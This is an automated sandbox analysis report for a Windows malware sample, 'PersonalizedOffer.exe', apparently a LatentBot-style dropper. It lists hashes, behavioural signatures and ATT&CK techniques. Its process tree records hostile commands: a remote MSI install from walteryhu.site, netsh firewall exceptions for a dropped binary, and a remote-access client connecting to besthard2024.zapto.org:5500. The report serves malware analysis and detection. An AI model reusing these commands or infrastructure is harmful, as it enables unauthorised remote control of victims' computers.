Analysis
-
max time kernel
298s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29-09-2024 08:38
Static task
static1
Behavioral task
behavioral1
Sample
PersonalizedOffer.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
PersonalizedOffer.exe
Resource
win10v2004-20240802-en
General
-
Target
PersonalizedOffer.exe
-
Size
3.9MB
-
MD5
09e3aa460dbf9cddbb402354cb854ced
-
SHA1
e27bf77f6cf806e1c841fc487872d9f5f75a75f7
-
SHA256
99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b
-
SHA512
5521bdd944d58a9cf524959598fac97f810090d2f934afdb00809a75c46c163e053b0d092f955805d0be150ecbb137c1814f92c5f1887bf45ad9ee17f67dfa6c
-
SSDEEP
98304:7tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqYxLI:7tSb9+zykLmxd/cHwOkp7jI
Malware Config
Extracted
latentbot
besthard2024.zapto.org
Signatures
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 1884 netsh.exe 1600 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PersonalizedOffer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation PersonalizedOffer.exe -
Executes dropped EXE 4 IoCs
Processes:
MSI961C.tmpPrintDrivers.exePrintDriver.exePrintDrivers.exepid process 3940 MSI961C.tmp 1148 PrintDrivers.exe 3296 PrintDriver.exe 3252 PrintDrivers.exe -
Loads dropped DLL 8 IoCs
Processes:
MsiExec.exeMsiExec.exepid process 4976 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 1364 MsiExec.exe 1364 MsiExec.exe 1364 MsiExec.exe 1364 MsiExec.exe 1364 MsiExec.exe -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2336 msiexec.exe -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 20 2336 msiexec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
PersonalizedOffer.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\X: PersonalizedOffer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Q: PersonalizedOffer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: PersonalizedOffer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: PersonalizedOffer.exe File opened (read-only) \??\R: PersonalizedOffer.exe File opened (read-only) \??\V: PersonalizedOffer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: PersonalizedOffer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: PersonalizedOffer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: PersonalizedOffer.exe File opened (read-only) \??\K: PersonalizedOffer.exe File opened (read-only) \??\W: PersonalizedOffer.exe File opened (read-only) \??\Y: PersonalizedOffer.exe File opened (read-only) \??\E: PersonalizedOffer.exe File opened (read-only) \??\H: PersonalizedOffer.exe File opened (read-only) \??\N: PersonalizedOffer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: PersonalizedOffer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: PersonalizedOffer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: PersonalizedOffer.exe File opened (read-only) \??\T: PersonalizedOffer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: PersonalizedOffer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: PersonalizedOffer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: PersonalizedOffer.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in Windows directory 11 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8964.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9210.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI93D9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI961C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI90F5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI91B2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9221.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI92CE.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
attrib.execmd.exePrintDrivers.exeMSI961C.tmpPrintDrivers.execmd.exeattrib.exePersonalizedOffer.exeMsiExec.exemsiexec.exeMsiExec.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI961C.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PersonalizedOffer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 18 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4776 timeout.exe 680 timeout.exe 3688 timeout.exe 4452 timeout.exe 860 timeout.exe 1108 timeout.exe 3972 timeout.exe 3212 timeout.exe 5092 timeout.exe 4900 timeout.exe 1416 timeout.exe 4204 timeout.exe 1680 timeout.exe 2680 timeout.exe 3236 timeout.exe 3704 timeout.exe 2904 timeout.exe 2880 timeout.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3200 taskkill.exe 2444 taskkill.exe 2008 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msiexec.exePrintDrivers.exepid process 4980 msiexec.exe 4980 msiexec.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exePersonalizedOffer.exedescription pid process Token: SeSecurityPrivilege 4980 msiexec.exe Token: SeCreateTokenPrivilege 1244 PersonalizedOffer.exe Token: SeAssignPrimaryTokenPrivilege 1244 PersonalizedOffer.exe Token: SeLockMemoryPrivilege 1244 PersonalizedOffer.exe Token: SeIncreaseQuotaPrivilege 1244 PersonalizedOffer.exe Token: SeMachineAccountPrivilege 1244 PersonalizedOffer.exe Token: SeTcbPrivilege 1244 PersonalizedOffer.exe Token: SeSecurityPrivilege 1244 PersonalizedOffer.exe Token: SeTakeOwnershipPrivilege 1244 PersonalizedOffer.exe Token: SeLoadDriverPrivilege 1244 PersonalizedOffer.exe Token: SeSystemProfilePrivilege 1244 PersonalizedOffer.exe Token: SeSystemtimePrivilege 1244 PersonalizedOffer.exe Token: SeProfSingleProcessPrivilege 1244 PersonalizedOffer.exe Token: SeIncBasePriorityPrivilege 1244 PersonalizedOffer.exe Token: SeCreatePagefilePrivilege 1244 PersonalizedOffer.exe Token: SeCreatePermanentPrivilege 1244 PersonalizedOffer.exe Token: SeBackupPrivilege 1244 PersonalizedOffer.exe Token: SeRestorePrivilege 1244 PersonalizedOffer.exe Token: SeShutdownPrivilege 1244 PersonalizedOffer.exe Token: SeDebugPrivilege 1244 PersonalizedOffer.exe Token: SeAuditPrivilege 1244 PersonalizedOffer.exe Token: SeSystemEnvironmentPrivilege 1244 PersonalizedOffer.exe Token: SeChangeNotifyPrivilege 1244 PersonalizedOffer.exe Token: SeRemoteShutdownPrivilege 1244 PersonalizedOffer.exe Token: SeUndockPrivilege 1244 PersonalizedOffer.exe Token: SeSyncAgentPrivilege 1244 PersonalizedOffer.exe Token: SeEnableDelegationPrivilege 1244 PersonalizedOffer.exe Token: SeManageVolumePrivilege 1244 PersonalizedOffer.exe Token: SeImpersonatePrivilege 1244 PersonalizedOffer.exe Token: SeCreateGlobalPrivilege 1244 PersonalizedOffer.exe Token: SeCreateTokenPrivilege 1244 PersonalizedOffer.exe Token: SeAssignPrimaryTokenPrivilege 1244 PersonalizedOffer.exe Token: SeLockMemoryPrivilege 1244 PersonalizedOffer.exe Token: SeIncreaseQuotaPrivilege 1244 PersonalizedOffer.exe Token: SeMachineAccountPrivilege 1244 PersonalizedOffer.exe Token: SeTcbPrivilege 1244 PersonalizedOffer.exe Token: SeSecurityPrivilege 1244 PersonalizedOffer.exe Token: SeTakeOwnershipPrivilege 1244 PersonalizedOffer.exe Token: SeLoadDriverPrivilege 1244 PersonalizedOffer.exe Token: SeSystemProfilePrivilege 1244 PersonalizedOffer.exe Token: SeSystemtimePrivilege 1244 PersonalizedOffer.exe Token: SeProfSingleProcessPrivilege 1244 PersonalizedOffer.exe Token: SeIncBasePriorityPrivilege 1244 PersonalizedOffer.exe Token: SeCreatePagefilePrivilege 1244 PersonalizedOffer.exe Token: SeCreatePermanentPrivilege 1244 PersonalizedOffer.exe Token: SeBackupPrivilege 1244 PersonalizedOffer.exe Token: SeRestorePrivilege 1244 PersonalizedOffer.exe Token: SeShutdownPrivilege 1244 PersonalizedOffer.exe Token: SeDebugPrivilege 1244 PersonalizedOffer.exe Token: SeAuditPrivilege 1244 PersonalizedOffer.exe Token: SeSystemEnvironmentPrivilege 1244 PersonalizedOffer.exe Token: SeChangeNotifyPrivilege 1244 PersonalizedOffer.exe Token: SeRemoteShutdownPrivilege 1244 PersonalizedOffer.exe Token: SeUndockPrivilege 1244 PersonalizedOffer.exe Token: SeSyncAgentPrivilege 1244 PersonalizedOffer.exe Token: SeEnableDelegationPrivilege 1244 PersonalizedOffer.exe Token: SeManageVolumePrivilege 1244 PersonalizedOffer.exe Token: SeImpersonatePrivilege 1244 PersonalizedOffer.exe Token: SeCreateGlobalPrivilege 1244 PersonalizedOffer.exe Token: SeCreateTokenPrivilege 1244 PersonalizedOffer.exe Token: SeAssignPrimaryTokenPrivilege 1244 PersonalizedOffer.exe Token: SeLockMemoryPrivilege 1244 PersonalizedOffer.exe Token: SeIncreaseQuotaPrivilege 1244 PersonalizedOffer.exe Token: SeMachineAccountPrivilege 1244 PersonalizedOffer.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
msiexec.exePrintDriver.exepid process 2336 msiexec.exe 2336 msiexec.exe 3296 PrintDriver.exe 3296 PrintDriver.exe 3296 PrintDriver.exe 3296 PrintDriver.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
PrintDriver.exepid process 3296 PrintDriver.exe 3296 PrintDriver.exe 3296 PrintDriver.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exePersonalizedOffer.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4980 wrote to memory of 4976 4980 msiexec.exe MsiExec.exe PID 4980 wrote to memory of 4976 4980 msiexec.exe MsiExec.exe PID 4980 wrote to memory of 4976 4980 msiexec.exe MsiExec.exe PID 1244 wrote to memory of 2336 1244 PersonalizedOffer.exe msiexec.exe PID 1244 wrote to memory of 2336 1244 PersonalizedOffer.exe msiexec.exe PID 1244 wrote to memory of 2336 1244 PersonalizedOffer.exe msiexec.exe PID 4980 wrote to memory of 1364 4980 msiexec.exe MsiExec.exe PID 4980 wrote to memory of 1364 4980 msiexec.exe MsiExec.exe PID 4980 wrote to memory of 1364 4980 msiexec.exe MsiExec.exe PID 4980 wrote to memory of 3940 4980 msiexec.exe MSI961C.tmp PID 4980 wrote to memory of 3940 4980 msiexec.exe MSI961C.tmp PID 4980 wrote to memory of 3940 4980 msiexec.exe MSI961C.tmp PID 1244 wrote to memory of 1520 1244 PersonalizedOffer.exe cmd.exe PID 1244 wrote to memory of 1520 1244 PersonalizedOffer.exe cmd.exe PID 1244 wrote to memory of 1520 1244 PersonalizedOffer.exe cmd.exe PID 5008 wrote to memory of 4104 5008 cmd.exe mode.com PID 5008 wrote to memory of 4104 5008 cmd.exe mode.com PID 1520 wrote to memory of 2632 1520 cmd.exe attrib.exe PID 1520 wrote to memory of 2632 1520 cmd.exe attrib.exe PID 1520 wrote to memory of 2632 1520 cmd.exe attrib.exe PID 5008 wrote to memory of 3372 5008 cmd.exe cmd.exe PID 5008 wrote to memory of 3372 5008 cmd.exe cmd.exe PID 5008 wrote to memory of 4720 5008 cmd.exe cmd.exe PID 5008 wrote to memory of 4720 5008 cmd.exe cmd.exe PID 4720 wrote to memory of 1680 4720 cmd.exe reg.exe PID 4720 wrote to memory of 1680 4720 cmd.exe reg.exe PID 5008 wrote to memory of 1320 5008 cmd.exe WMIC.exe PID 5008 wrote to memory of 1320 5008 cmd.exe WMIC.exe PID 5008 wrote to memory of 1988 5008 cmd.exe findstr.exe PID 5008 wrote to memory of 1988 5008 cmd.exe findstr.exe PID 1520 wrote to memory of 2624 1520 cmd.exe attrib.exe PID 1520 wrote to memory of 2624 1520 cmd.exe attrib.exe PID 1520 wrote to memory of 2624 1520 cmd.exe attrib.exe PID 1520 wrote to memory of 4268 1520 cmd.exe cmd.exe PID 1520 wrote to memory of 4268 1520 cmd.exe cmd.exe PID 1520 wrote to memory of 4268 1520 cmd.exe cmd.exe PID 1520 wrote to memory of 1760 1520 cmd.exe cmd.exe PID 1520 wrote to memory of 1760 1520 cmd.exe cmd.exe PID 1520 wrote to memory of 1760 1520 cmd.exe cmd.exe PID 5008 wrote to memory of 4460 5008 cmd.exe cmd.exe PID 5008 wrote to memory of 4460 5008 cmd.exe cmd.exe PID 5008 wrote to memory of 1288 5008 cmd.exe cmd.exe PID 5008 wrote to memory of 1288 5008 cmd.exe cmd.exe PID 1288 wrote to memory of 5040 1288 cmd.exe mode.com PID 1288 wrote to memory of 5040 1288 cmd.exe mode.com PID 1288 wrote to memory of 1884 1288 cmd.exe netsh.exe PID 1288 wrote to memory of 1884 1288 cmd.exe netsh.exe PID 1288 wrote to memory of 1600 1288 cmd.exe netsh.exe PID 1288 wrote to memory of 1600 1288 cmd.exe netsh.exe PID 1288 wrote to memory of 4616 1288 cmd.exe WMIC.exe PID 1288 wrote to memory of 4616 1288 cmd.exe WMIC.exe PID 1288 wrote to memory of 2988 1288 cmd.exe findstr.exe PID 1288 wrote to memory of 2988 1288 cmd.exe findstr.exe PID 1288 wrote to memory of 3296 1288 cmd.exe PrintDriver.exe PID 1288 wrote to memory of 3296 1288 cmd.exe PrintDriver.exe PID 5008 wrote to memory of 860 5008 cmd.exe timeout.exe PID 5008 wrote to memory of 860 5008 cmd.exe timeout.exe PID 5008 wrote to memory of 2444 5008 cmd.exe taskkill.exe PID 5008 wrote to memory of 2444 5008 cmd.exe taskkill.exe PID 5008 wrote to memory of 1108 5008 cmd.exe timeout.exe PID 5008 wrote to memory of 1108 5008 cmd.exe timeout.exe PID 5008 wrote to memory of 2008 5008 cmd.exe taskkill.exe PID 5008 wrote to memory of 2008 5008 cmd.exe taskkill.exe PID 5008 wrote to memory of 3972 5008 cmd.exe timeout.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2632 attrib.exe 2624 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PersonalizedOffer.exe"C:\Users\Admin\AppData\Local\Temp\PersonalizedOffer.exe"1⤵
- Checks computer location settings
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\PersonalizedOffer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1727358523 "2⤵
- Use of msiexec (install) with remote resource
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIE7C35.tmp"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2632
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:4268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"3⤵
- System Location Discovery: System Language Discovery
PID:1760
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8686D1DD78A936B5F808CFA8DAC87A13 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4976
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 62CB3AC185A89FD90D6612E021FD34972⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1364
-
-
C:\Windows\Installer\MSI961C.tmp"C:\Windows\Installer\MSI961C.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Games\PrintDrivers.exe"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1148
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\mode.comMode 90,202⤵PID:4104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:3372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:1680
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline2⤵PID:1320
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"2⤵PID:1988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"2⤵PID:4460
-
-
C:\Windows\system32\cmd.execmd2⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\mode.comMode 90,203⤵PID:5040
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1884
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1600
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline3⤵PID:4616
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"3⤵PID:2988
-
-
C:\Games\PrintDriver.exeC:\Games\PrintDriver.exe -autoreconnect ID:5996338 -connect besthard2024.zapto.org:5500 -run3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3296
-
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:860
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2444
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1108
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2008
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:3972
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:3200
-
-
C:\Games\PrintDrivers.exeC:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "1⤵PID:1548
-
C:\Windows\system32\mode.comMode 90,202⤵PID:3932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:4204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵PID:820
-
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:4344
-
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4776
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:680
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4900
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3704
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1416
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4204
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2904
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3688
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3212
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1680
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2680
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:5092
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4452
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3236
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2880
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
418KB
MD5f7f2a9a5039e0e283b68da1af2f35ce4
SHA1335d127e757c57a2b2f241546efd0ff4ab9fa0b5
SHA256bd2fee431041c0fd3c3c6c753b7d2e7609895d77090e7bf1a1917b1546966482
SHA51212e702b2b7b68f02b785f932b68666864071d85fbae4eb8da183fb5a52ee29feff5253660f452cf2d89c6a070885430b353b47b5bdc9d09346309496f92f078d
-
Filesize
2.8MB
MD527c1c264c6fce4a5f44419f1783db8e0
SHA1e071486e4dfef3a13f958a252d7000d3ce7bfd89
SHA25629379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
